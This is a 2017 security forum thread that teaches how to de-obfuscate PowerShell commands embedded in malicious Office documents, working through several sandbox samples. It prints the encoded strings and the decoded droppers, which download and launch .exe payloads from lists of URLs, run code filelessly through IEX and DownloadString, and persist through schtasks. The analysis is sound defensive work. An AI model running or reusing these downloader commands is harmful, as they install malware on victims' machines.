How-to Guide How to de-obfuscate PowerShell script commands (Examples).

Discussion in 'Tutorials & Guides' started by Andy Ful, Oct 20, 2017.

  1. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    #1 Andy Ful, Oct 20, 2017
    Last edited: Oct 20, 2017
    I am going to present some examples of de-obfuscating PowerShell script commands embedded in malicious documents, using the results from hybrid-analysis.com.
    .
    Please, use this method only in a virtual machine, even when you are an experienced user.
    .
    Many malicious documents have obfuscated VBA macros that can run encoded and obfuscated script commands (3 code hiding layers). Sometimes the obfuscated VBA functions are visible under the 'Extracted Strings' section in the sample analysis on Free Automated Malware Analysis Service - powered by VxStream Sandbox website, so they can be de-obfuscated and decoded. But often, this could be time-consuming. I noticed, that in many cases, sample analysis shows the code that is run after de-obfuscating macros and decoding PowerShell commands (BASE64 decoding). That code can be seen under the 'Hybrid Analysis' section. But still, in some cases, it is obfuscated and unreadable. In this post, I present the simple method to de-obfuscate one popular code-hiding method.
    .
    Let's start with the example from 'Malware Samples 18/10/17 #11'.
    .
    0245262.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '0245262.doc'
    .
    Open the above link and navigate to 'Hybrid Analysis' section - you will see something like that:
    .
    WINWORD.EXE /n "C:\378cad5cd01226de423b71f4081c18d2a0479b648a829d0e355f55d0863f2c79.doc" (PID: 1096)
    cmd.exe "cmd /V /C "set %qnWiiHuKf%=p^owe^rs&&set %KdQVMpNqo%=he^ll&&!%qnWiiHuKf%!!%KdQVMpNqo%! -e LgAoACA...AKQAgAA== (PID: 4056)
    powershell.exe powershell -e LgAoACA...AKQAgAA== (PID: 4092, Additional Context: IEX(-JoIn ('36h119h115U99S114{105U112U116i32:61{32{110c101c119i45S111%98h106m101m99%116m32!45i67S111:109c79c98h106U101S99U116:32c87:83U99%114c105c112%116i46i83i104c101{108%108:59:36!119!101c98m99h108%105%101%110%116m32c61c32h110h101U119%45S111%98!106:101i99{116i32h83%121:115m116h101%109:46!78i101i116U46U87%101S98h67i108{105c101S110h116:59%36{114m97{110U100h111:109h32!61c32i110h101%119:45:111i98%106!101h99m116S32{114%97!110S100U111{109:59{36i117{114S108h115!32:61S32!39S104c116%116c112i58:47m47c102{111S108{120c100{111S103{101%114U109c46U105i110%102c111S47{49%39{46%83i112!108%105U116c40h39S44h39!41!59i36:110i97S109c101h32U61h32%36S114m97!110%100m111U109h46c110%101c120{116m40i49h44U32h54S53U53m51h54m41c59m36U112h97{116{104U32U61%32S36i101i110h118{58%116S101%109%112U32U43!32%39h92S39!32%43i32h36{110!97{109i101S32c43:32i39c46:101S120i101%39h59:102c111U114h101{97%99:104%40m36{117!114h108m32!105i110!32m36c117m114U108%115U41!123c116i114S121U123:36:119i101m98%99S108h105:101:110!116U46!68:111:119h110U108m111:97{100!70i105S108:101U40h36:117!114S108:46U84c111U83m116%114c105{110c103i40U41i44U32!36i112U97m116!104i41!59{83!116%97i114c116%45h80S114m111{99:101U115{115{32h36:112U97:116S104c59U98c114{101!97m107%59!125h99h97m116m99:104!123S119%114i105i116:101m45i104S111%115i116h32c36U95!46S69i120!99{101m112U116{105c111%110:46h77i101U115%115{97:103U101%59!125S125'.sPLIt(':i{mShU!c%') | forEach { ( [iNT] $_ -As [cHAR])})))
    62602.exe (PID: 3304) 14/63 Hash Seen Before
    62602.exe g (PID: 3312) 14/63 Hash Seen Before
    schtasks.exe /CREATE /TN "2SyJgHnV" /TR "%TEMP%\62602.exe" /SC ONLOGON /RL HIGHEST /F (PID: 3332)
    explorer.exe (PID: 3060) Hash Seen Before
    (...) Please refer to the XML/JSON reports to view the remaining child processes.
    DW20.EXE -x -s 1504 (PID: 3024) Hash Seen Before
    62602.exe (PID: 3276) 14/63
    .
    .
    The string LgAoACA...AKQAgAA== in the above text was shortened, the original string is many times longer and contains encoded (BASE64) malicious PowerShell commands. The IEX is here the dangerous command that runs the code, so it must be skipped!!! You do not want to run the malicious PowerShell script.
    The last fragment: -JoIn ('36h119h115 ... forEach { ( [iNT] $_ -As [cHAR])})
    contains obfuscated PowerShell commands and the code that de-obfuscates them.
    .
    So, de-obfuscating instructions has the form:
    -Join ('obfuscated commands here'.sPLIt(':i{mShU!c%') | forEach { ( [iNT] $_ -As [cHAR])})
    The above instructions tell PowerShell that the numbers (in 'obfuscated commands here') should be converted to appropriate UNICODE characters, and that ':i{mShU!c%' characters are used to split the numbers, so should be skipped when decoding. Next, all decoded characters (space character included) should be joined together.
    .
    But, we can use this instruction, too!!!
    Let's go:
    .
    Code:
    $EncodedString = '36h119h115U99S114{105U112U116i32:61{32{110c101c119i45S111%98h106m101m99%116m32!45i67S111:109c79c98h106U101S99U116:32c87:83U99%114c105c112%116i46i83i104c101{108%108:59:36!119!101c98m99h108%105%101%110%116m32c61c32h110h101U119%45S111%98!106:101i99{116i32h83%121:115m116h101%109:46!78i101i116U46U87%101S98h67i108{105c101S110h116:59%36{114m97{110U100h111:109h32!61c32i110h101%119:45:111i98%106!101h99m116S32{114%97!110S100U111{109:59{36i117{114S108h115!32:61S32!39S104c116%116c112i58:47m47c102{111S108{120c100{111S103{101%114U109c46U105i110%102c111S47{49%39{46%83i112!108%105U116c40h39S44h39!41!59i36:110i97S109c101h32U61h32%36S114m97!110%100m111U109h46c110%101c120{116m40i49h44U32h54S53U53m51h54m41c59m36U112h97{116{104U32U61%32S36i101i110h118{58%116S101%109%112U32U43!32%39h92S39!32%43i32h36{110!97{109i101S32c43:32i39c46:101S120i101%39h59:102c111U114h101{97%99:104%40m36{117!114h108m32!105i110!32m36c117m114U108%115U41!123c116i114S121U123:36:119i101m98%99S108h105:101:110!116U46!68:111:119h110U108m111:97{100!70i105S108:101U40h36:117!114S108:46U84c111U83m116%114c105{110c103i40U41i44U32!36i112U97m116!104i41!59{83!116%97i114c116%45h80S114m111{99:101U115{115{32h36:112U97:116S104c59U98c114{101!97m107%59!125h99h97m116m99:104!123S119%114i105i116:101m45i104S111%115i116h32c36U95!46S69i120!99{101m112U116{105c111%110:46h77i101U115%115{97:103U101%59!125S125'
    $obfuscatingCharacters = ':i{mShU!c%'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    .
    After making copy of the above code and paste to PowerShell console (press also Enter key), you will see de-obfuscated commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://aaaaa.info/1'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
    .
    .
    Rech-82559693785.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'Rech-82559693785.doc'
    .
    Code:
    $EncodedString = '36,119,115, 99 ,114 ,105 ,112 , 116 ,32 ,61 , 32, 110 , 101 , 119, 45,111,98 , 106 , 101,99,116 ,32 ,45 , 67,111 , 109 , 79,98 ,106 ,101,99, 116, 32,87 , 83,99,114 ,105,112 , 116 ,46, 83, 104 ,101 , 108 ,108,59 , 36 ,119 ,101 ,98,99 ,108,105 ,101, 110 ,116, 32,61, 32 , 110,101, 119 , 45 ,111 , 98, 106, 101 , 99,116 ,32 ,83 , 121 ,115 , 116 , 101, 109 , 46, 78 ,101,116,46 , 87 , 101 , 98 ,67, 108 , 105,101, 110, 116 ,59 , 36 ,114 ,97 , 110,100 ,111, 109, 32 ,61, 32,110 ,101 ,119 ,45, 111, 98,106 ,101,99, 116 , 32, 114 , 97,110,100, 111 ,109, 59 ,36,117 , 114 ,108 ,115 ,32 , 61 , 32,39 ,104 ,116 ,116 , 112 , 58, 47 , 47 , 108, 121 ,109 , 97,110 ,105 ,116 ,101 ,46 , 99 , 111, 109 ,47,82, 119 , 97 , 89,103,97,109,68 , 47,44,104 ,116 ,116 , 112 ,58 , 47, 47,104 ,97 , 108 ,97 , 114 ,105 ,115,46 , 99 ,111, 109 ,47,71 , 72 ,101,47 , 44,104 ,116, 116, 112 ,58 ,47 , 47 , 108, 111 , 118,101 ,110 , 100 ,117 , 115 ,107, 105 , 46 ,99, 111 ,109,47 , 119,69,115, 106,104,78 ,100 , 47,44 , 104 , 116, 116,112 ,58,47,47 ,97,112, 101, 114 ,102,101 , 99 ,116,105 , 109, 97 , 103 , 101 , 46,112 ,108, 47, 47 ,72 , 87 ,109 , 119 ,47, 44, 104, 116 , 116,112 , 58, 47, 47 , 108 ,117, 120, 109, 101 ,100 , 105 , 97 , 46, 99 ,111, 109,46 , 112, 108, 47 ,112 , 111 ,114 ,116,102, 111, 108, 105 ,111,47, 111 , 103,90, 47 , 39, 46, 83,112,108,105,116,40, 39,44, 39, 41, 59, 36, 110, 97, 109 , 101 ,32 ,61,32, 36, 114,97 ,110 , 100 , 111,109,46, 110,101 ,120 , 116 ,40 , 49,44, 32 ,54, 53 ,53 , 51 ,54, 41,59, 36,112,97 ,116, 104 , 32, 61 ,32 , 36,101, 110, 118 , 58,116,101 , 109 ,112 ,32,43 ,32, 39 ,92 , 39,32, 43 ,32 , 36 , 110 ,97, 109 ,101,32 ,43 ,32,39 ,46 , 101,120 , 101,39, 59 , 102,111,114,101, 97,99 ,104,40,36, 117 ,114, 108, 32, 105,110,32, 36 ,117, 114 , 108 , 115 , 41 , 123,116, 114, 121,123 , 36 ,119 , 101 ,98,99 ,108, 105 , 101 , 110 , 116 ,46, 68, 111, 119 ,110,108 ,111,97 ,100,70,105 , 108 ,101 , 40 ,36, 117, 114 , 108 , 46, 84 ,111 , 83 , 116, 114, 105,110, 103,40, 41,44,32 ,36 ,112 , 97 , 116,104 , 41,59 ,83,116,97,114,116,45 , 80 , 114 , 111 , 99 , 101, 115 ,115 ,32 ,36 , 112,97, 116,104,59 ,98 , 114,101, 97, 107 , 59, 125, 99,97 , 116 , 99, 104, 123 , 119, 114 , 105 ,116 , 101,45 , 104 , 111 ,115, 116, 32 , 36 ,95,46 , 69 ,120, 99 , 101,112 ,116,105 ,111 ,110,46, 77, 101 , 115 , 115 , 97 ,103,101, 59, 125, 125'
    $obfuscatingCharacters = ','
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    .
    De-obfuscated PowerShell commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://bbbbb.com/RwaYgamD/,http://ccccc.com/GHe/,http://ddddd.com/wEsjhNd/,http://eeeee.pl//HWmw/,http://fffff.com.pl/portfolio/ogZ/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name +'.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
    .
    .
    index.html.17.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'index.html.17'
    .
    Code:
    $EncodedString = '36d119&115;99&114K105&112K116d32;61d32&110}101K119!45K111z98!106n101;99G116&32d45&67G111z109Q79G98!106}101;99!116n32G87!83&99n114Q105K112&116;46;83G104K101Q108z108n59z36Q119d101&98G99&108z105!101;110K116;32n61}32}110d101d119}45d111K98!106z101z99d116G32&83K121K115;116!101n109Q46&78G101;116!46n87&101;98z67Q108}105d101&110&116;59;36&114K97G110n100n111n109&32z61n32}110d101K119!45z111;98!106;101G99Q116d32G114;97&110z100Q111z109G59Q36K117Q114d108}115K32n61;32K39n104}116;116;112z58!47K47;112!105;110}103d115K116K97d116}101d46G99!111}109&47d66z47Q44G104G116G116Q112Q58Q47z47K99!108Q97z110G99n111}109&115Q46}99n111z109Q47G118Q76Q103K75d116G119n109n65d76Q47;44K104&116}116n112}58z47d47d107G101K118G105K110}103n114K101z97G118;101K115G46n99z111d109z47z100&82!47;44}104d116Q116Q112&58z47;47z116z104z105d110;107G45d102&97d99}116z111d114!121}46K99&104!47;111!73;82}106z117}110n119&81&110!47Q44;104!116Q116Q112&58n47&47&109z111z98z105G108&105!122}114d46!99&111z109n47&117;71z102d68Q77}69n47&39}46;83Q112K108n105z116d40!39G44G39;41z59n36!110K97z109Q101G32!61z32!36n114n97&110z100&111}109}46z110n101K120!116d40n49Q44z32&54z53Q53d51;54;41&59}36Q112!97n116&104;32z61!32!36G101n110Q118Q58}116K101;109z112G32z43K32n39Q92!39Q32!43G32z36Q110G97K109n101d32}43n32}39K46&101G120G101d39d59n102d111Q114!101!97d99K104&40n36!117!114z108G32&105d110!32G36d117n114z108n115z41!123&116}114z121;123K36n119z101!98d99;108;105n101n110d116d46d68&111K119Q110Q108!111n97&100d70n105!108z101n40d36!117K114Q108K46!84z111z83n116G114&105&110n103G40K41Q44n32!36G112z97;116z104}41G59z83;116;97n114;116&45G80&114z111!99}101z115G115Q32;36Q112d97Q116}104!59z98Q114&101G97K107K59;125Q99Q97&116d99&104d123z119&114z105;116K101G45!104K111;115;116G32!36K95&46;69K120&99K101&112n116G105;111}110!46!77K101G115K115&97;103!101G59&125!125'
    $obfuscatingCharacters = '&!Kzd}nQ;G'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    .
    De-obfuscated script commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://ggggg.com/B/,http://hhhhh.com/vLgKtwmAL/,http://iiiii.com/dR/,http://jjjjj.ch/oIRjunwQn/,http://kkkkk.com/uGfDME/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
    .
    .
    DHL number 53611761989PDW_YPZLF (29 Sep 17).pdf
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'DHL number 53611761989PDW_YPZLF (29 Sep 17).pdf'
    .
    Code:
    $EncodedString = '36 ,119 , 115,99 ,114 ,105, 112 , 116, 32, 61 , 32,110 , 101 , 119,45 ,111 , 98, 106 ,101, 99 , 116,32,45 ,67 ,111, 109 ,79 ,98 , 106, 101, 99,116,32,87,83 , 99,114 , 105 , 112,116,46,83,104 ,101, 108 ,108 ,59, 36, 119,101,98,99 , 108,105,101 , 110 ,116 , 32, 61,32 , 110 ,101, 119,45,111, 98,106 ,101,99,116, 32,83 ,121, 115 , 116 , 101 ,109 ,46 ,78, 101 ,116,46 , 87,101,98, 67,108 , 105,101 ,110 ,116 ,59,36,114,97, 110 ,100 , 111,109,32 ,61, 32 , 110, 101 , 119,45 ,111,98 , 106, 101, 99,116 , 32, 114 ,97 , 110 ,100,111 ,109,59 , 36 ,117, 114, 108,115 , 32, 61 ,32 ,39, 104 ,116,116,112 ,58,47 , 47 ,112,117 ,109,112, 97,46,99 , 111,109, 46,97 , 117 ,47 , 113 , 103 ,73 , 47 ,44,104,116,116, 112 , 58 ,47 , 47,110, 111,118 ,97 , 112 ,108,97,122, 97,46,99 ,111, 109, 47, 109, 47 ,44,104 ,116, 116,112,58 , 47 , 47 ,119 , 105, 99 ,107 , 101, 100,115 , 107 ,105 ,110 , 122 ,46 ,110 , 101,116 ,47 , 73 ,106, 121 ,103 , 104 ,47, 44 , 104 ,116, 116,112 ,58 ,47 , 47 ,114 ,97,105 , 110, 98, 111 , 119, 116, 117 , 114 ,116, 108, 101 ,46 , 111 ,114, 103 , 46,117,107,47 , 79 , 99, 110,100 , 81, 66, 85 ,47, 44 , 104,116 ,116, 112 , 58 , 47, 47,114 ,97, 119 ,109,97,116, 101, 114 ,105 , 97, 108,115,117 ,112 , 112 ,108 , 105,101 ,114 , 115 , 46 , 99, 111,109, 47,77,66 , 78, 111 ,47, 39 ,46,83 , 112 , 108,105 ,116 ,40 , 39,44 ,39,41 ,59 , 36 ,110 ,97, 109,101 ,32, 61 , 32, 36, 114,97 , 110 , 100 , 111 , 109, 46 ,110,101, 120 ,116,40 , 49 , 44 ,32 , 54,53 , 53,51, 54 , 41, 59,36 ,112 , 97 , 116 ,104 , 32, 61,32, 36 , 101 , 110,118 ,58, 116 ,101 , 109 ,112 , 32,43 , 32 ,39 , 92,39,32,43 ,32, 36 ,110 , 97 ,109, 101 , 32 ,43,32, 39 , 46 , 101 ,120,101 , 39 ,59, 102 , 111 ,114 , 101, 97 ,99, 104 ,40,36 , 117,114 , 108,32,105,110, 32, 36 , 117 ,114,108 ,115, 41 , 123,116 ,114 , 121, 123, 36 ,119 , 101 , 98 ,99 ,108 , 105 , 101,110 , 116, 46 ,68 ,111 ,119 , 110, 108, 111,97 , 100,70,105, 108 ,101,40,36, 117,114, 108 , 46,84 , 111, 83,116, 114 , 105, 110 , 103 ,40,41 ,44,32 ,36, 112 ,97 , 116,104, 41 , 59,83,116 , 97 , 114,116 , 45,80 , 114 , 111,99, 101 ,115,115 ,32, 36 , 112 ,97,116, 104, 59 , 98, 114 , 101 ,97,107 , 59 , 125, 99 ,97 ,116,99, 104 ,123,119 , 114 , 105, 116, 101 , 45, 104, 111, 115 ,116 , 32, 36,95 , 46 ,69 , 120,99, 101 , 112 , 116, 105,111 ,110,46 ,77 , 101 , 115 ,115, 97, 103,101, 59 ,125, 125'
    $obfuscatingCharacters = ','
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    .
    De-obfuscated PowerShell commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://lllll.com.au/qgI/,http://mmmmm.com/m/,http://nnnnn.net/Ijygh/,http://ooooo.org.uk/OcndQBU/,
    http://ppppp.com/MBNo/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name +'.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
    .
    .
    Rechnung.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '2017-11-Oct-17'
    .
    Code:
    $EncodedString = '36Q119w115F99F114F105}112M116M32Q61u32p110p101M119p45u111u98u106}101S99Z116Z32F45Q67p111Q109F79u98M106Q101S99Z116Z32w87}83G99Q114w105F112}116p46Q83}104}101w108S108G59}36}119F101w98}99G108Z105F101}110F116S32F61F32p110M101F119M45S111u98u106p101w99S116p32}83u121M115w116Z101w109G46M78Z101u116M46u87Z101Q98M67F108Q105S101F110G116F59F36p114Q97S110u100Z111Q109Z32w61w32S110S101G119w45w111}98}106G101Z99}116M32u114w97M110G100G111w109u59M36w117Z114Z108p115S32u61w32F39}104M116p116S112G58S47}47S97}109M105}114S97S98w101G100G105w110}46w99G111M109}47}73}114S113u79Z98G98F87w87Q69Z68Q47Z44Q104p116Q116M112G58u47}47Z97F108p108Q115Z116p97p116Z101Q116u101w110Q116F46S99F111F109M47u84F90p90S87F109Q74Z47F44Z104S116M116M112M58M47u47Q102p105S108F108G105F115u99u104w46S99Z111Z109}47p78Z122}87p77M104F113Q67p115p47w44Z104Q116M116}112Q58Z47w47}101G100p105p116Z105M111Q110w115Q116G114p97}106M101M116G46}99w111S109M47G78}87u99}117S105Z71}71}90F80S47F44M104w116S116S112M58S47M47u101p115p109Z101}105F106Z101Q114G46F101Z117p47}108M112p118S84S119Q118Z100}100p47u39Q46w83}112Z108}105M116S40p39w44F39M41M59Q36S110}97Z109p101M32M61M32Q36p114Q97}110Q100p111w109u46p110Z101F120w116w40M49w44Q32G54G53F53M51w54F41}59Z36G112w97Z116M104u32F61S32}36}101G110Z118u58u116p101}109p112p32u43Z32w39F92Q39}32F43S32u36u110}97p109}101F32M43F32w39G46F101p120Z101Q39w59S102Q111Q114S101F97}99F104G40Z36Q117F114p108S32F105Q110p32p36}117p114u108M115Z41}123Q116G114p121}123M36S119p101S98Q99M108F105S101u110M116G46Q68Z111Q119F110G108w111F97u100Z70w105G108M101Q40u36w117u114F108}46F84u111u83}116Z114}105F110F103S40S41Q44F32u36G112S97M116S104w41Z59Q83}116F97F114S116G45u80Q114S111Q99S101}115Q115F32}36Z112p97Q116u104}59G98p114Z101Z97S107}59u125M99}97M116F99}104u123Z119Q114Q105u116F101w45u104Z111Z115w116M32}36p95Q46w69Z120Q99}101Q112S116u105Q111Q110w46S77S101G115G115Q97S103F101F59Q125u125'
    $obfuscatingCharacters = 'upM}FwZSQG'
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    .
    De-obfuscated PowerShell commands:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://qqqqq.com/IrqObbWWED/,http://rrrrr.com/TZZWmJ/,http://sssss.com/NzWMhqCs/,http://ttttt.com/NWcuiGGZP/,http://uuuuu.eu/lpvTwvdd/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' +
    $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
    .
    .
    REMARKS
    The PowerShell instructions:
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    do not execute de-obfuscated commands.
    All malware examples were taken from malware samples tested on Malware Hub (last four weeks).
    They are very similar. All of them try to use 'new-object System.Net.WebClient' command to download the payloads from the malicious websites. This command is disabled when the ConstrainedLanguage mode is set in PowerShell.
    .
    Hope it will help someone.
     
    daljeet, frogboy, tim one and 12 others like this.
  2. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    Example from Malware Samples 23/10/17 #10
    Transaction Details - 030PAF.doc ( 2017.doc on hybrid-analysis)
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '2017'
    Code:
    $EncodedString = '36 ,119 ,115, 99 , 114 ,105,112 ,116 , 32 , 61 , 32,110,101 ,119,45,111, 98 ,106 ,101 , 99 , 116 ,32 ,45 , 67, 111 , 109 , 79 ,98, 106,101 ,99, 116,32, 87 , 83,99,114 , 105 ,112 ,116, 46 , 83, 104, 101,108 , 108 ,59, 36,119,101 , 98 , 99,108 , 105, 101,110,116 , 32,61 ,32 ,110 ,101 , 119, 45 ,111 ,98 , 106 ,101 , 99 ,116, 32,83, 121,115 , 116 , 101,109 ,46 ,78, 101, 116 ,46 ,87,101, 98,67 ,108, 105, 101,110, 116 , 59 , 36 , 114,97,110 ,100 ,111,109 , 32 ,61, 32 , 110,101, 119, 45 ,111 , 98 , 106, 101 , 99,116,32 ,114 , 97 ,110, 100, 111,109 ,59 ,36, 117, 114 , 108 ,115,32,61 , 32 , 39 , 104,116,116, 112 ,58, 47 , 47, 98,114,111, 101 ,114, 97 , 114 ,116,46,100,101,47,99, 119, 78 ,90,47 ,44 , 104,116 , 116,112 , 58 , 47 , 47,103, 104, 101,105 , 110,101 , 109 , 97,110,110 , 46 , 100,101 ,47 ,112 ,113 , 74,110,106,47 ,44,104,116 ,116 , 112 , 58,47 ,47,114 , 97,115, 115 ,109, 117,115 ,101 ,110 ,46, 99 ,122 , 47,115 ,110 ,82 , 97 ,47, 44 , 104,116 ,116, 112,58, 47, 47 ,111 ,122,45 ,108 ,105,110 ,107 , 46, 99 ,111,109, 47, 113,120, 115 , 83 ,112 , 81 , 74,84,47 , 44 , 104,116,116,112, 58 ,47,47, 98,108 ,117,101,116, 111,110,103 , 117, 101 ,99, 97,109 ,112 ,101,114, 115,46 , 99,111 , 109 ,46, 97 , 117 , 47 ,106,81,76, 112, 73 ,108 , 98, 111 , 114,47 ,39, 46,83 ,112 ,108, 105 , 116 ,40 ,39 ,44 , 39 , 41 ,59, 36 , 110 ,97 ,109, 101 ,32 , 61,32, 36, 114 , 97 , 110,100 , 111 ,109,46 , 110 ,101,120,116, 40 , 49 ,44, 32,54,53, 53 , 51 ,54 ,41 ,59, 36 , 112 , 97,116,104,32, 61 , 32 , 36,101, 110,118 , 58,116,101 ,109 , 112, 32,43,32,39,92 , 39, 32 , 43,32 ,36,110,97, 109, 101 , 32, 43 , 32,39 , 46, 101,120 ,101,39, 59, 102, 111 ,114 ,101 ,97 , 99, 104 ,40, 36 , 117 ,114 , 108, 32 , 105, 110, 32,36,117 , 114,108 , 115 , 41 , 123, 116 , 114 ,121, 123 , 36 ,119, 101 ,98 , 99, 108 ,105,101,110 ,116, 46 ,68,111, 119 , 110,108 ,111, 97 , 100,70 , 105, 108, 101, 40, 36 , 117, 114,108, 46,84 ,111, 83 , 116, 114 , 105, 110 ,103 ,40 , 41, 44, 32 , 36, 112, 97 , 116,104, 41,59, 83 , 116 ,97,114, 116 , 45 , 80 , 114 , 111 ,99 , 101 ,115 , 115 ,32, 36, 112 ,97,116 , 104,59,98,114, 101 ,97 , 107 ,59 , 125,99, 97 ,116 ,99, 104, 123, 119 ,114 ,105,116 ,101 , 45 ,104, 111, 115, 116, 32,36, 95 ,46 ,69 ,120,99 , 101 , 112, 116 ,105,111 , 110,46 ,77, 101, 115, 115, 97, 103,101,59, 125, 125'
    $obfuscatingCharacters = ','
    -JoIn ($EncodedString.sPLIt($obfuscatingCharacters) | forEach { ( [iNT] $_ -As [cHAR])})
    De-obfuscated script:
    $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;
    $urls = 'http://aaaa/cwNZ/,http://bbbb/pqJnj/,http://cccc/snRa/,http://dddd/qxsSpQJT/,
    http://eeee/jQLpIlbor/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name +
    '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
    Nothing new.:)
     
  3. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    Example from Malware Samples 26-10-17 #9
    _3510084137412321755854810010016.lnk
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for '3510084137412355854810010016.rar'
    .
    This is very simple example of script obfuscation, and its role is obvious even without de-obfuscation. Anyway, it is a good example of popular obfuscation tricks:
    Code:
    cmd.exe /V /C "set ox=e^n&&set tq=^ers&&set oc=h^e^l^l&&set ar=^p^ow&&set ne=^W^i^nd^ows!ar!!tq!!oc!\v1.^0\!ar!!tq!!oc!.e^xe&&echo ^Iyo;
    ^iE^x^(^N^E^w^-O^bjE^CT^ ^Net.^WE^b^c^liEn^T).^Dow^N^l^oA^d^s^TRi^N^G('htt^p^s^:/^/a^aa^a^.aa^aaa^a^aa.co^m^/v^2/^gl.p^h^p^?^a^H^R0c^H^M^6Ly^9^mc^mV^lLm9w^a^G^F^t^cGV5^L^mN^v^b^S^9^2Mn^x^nd^k^R^R'^);^Z^Fe | !ne! -^no^p^ ^-"
    .
    First, we have to delete all occurrences of the ^ character:
    Code:
    cmd.exe /V /C "set ox=en&&set tq=ers&&set oc=hell&&set ar=pow&&set ne=Windows!ar!!tq!!oc!\v1.0\!ar!!tq!!oc!.exe&&echo Iyo;
    iEx(NEw-ObjECT Net.WEbcliEnT).DowNloAdsTRiNG('https://aaaa.aaaaaaaa.com/v2/gl.php?aHR0cHM6Ly9mcmVlLm9waGFtcGV5LmNvbS92MnxndkRR');ZFe | !ne! -nop -"
    .
    The script is more readable but now it uses the ! character to split variables: ar, tq, oc. So, we should replace the variables with their values (ar=pow , tq=ers , oc=hell --> powershell):
    ne=Windows!ar!!tq!!oc!\v1.0\!ar!!tq!!oc!.exe --> ne=Windowspowershell\v1.0\powershell.exe
    Now the script looks as follows:
    Code:
    cmd.exe /V /C "set ne=Windowspowershell\v1.0\powershell.exe&&echo Iyo;
    iEx(NEw-ObjECT Net.WEbcliEnT).DowNloAdsTRiNG('https://aaaa.aaaaaaaa.com/v2/gl.php?aHR0cHM6Ly9mcmVlLm9waGFtcGV5LmNvbS92MnxndkRR');ZFe | Windowspowershell\v1.0\powershell.exe -nop -"
    .
    We can skip the ne, Iyo, ZFe variables and lower some characters:
    Code:
    cmd.exe /V /C "echo ;
    iEx(New-Object Net.Webclient).DownloadString('https://aaaa.aaaaaaaa.com/v2/gl.php?aHR0cHM6Ly9mcmVlLm9waGFtcGV5LmNvbS92MnxndkRR'); | Windowspowershell\v1.0\powershell.exe -nop -"
    .
    So finally, the above script reads the content of the 'https://aaaa.aaaaaaaa.com/v2/gl.php?aHR0cHM6Ly9mcmVlLm9waGFtcGV5LmNvbS92MnxndkRR' file from the malicious website (PowerShell commands), and run filelessly using PowerShell. This can bypass the standard PowerShell ExecutionPolicy = Restricted, so the -bypass switch is not required.
    :)(y)
     
  4. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    Example from Malware Samples 27/10/17 #11
    Frage-zur-Rechnung.doc
    Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'Frage-zur-Rechnung'
    Code:
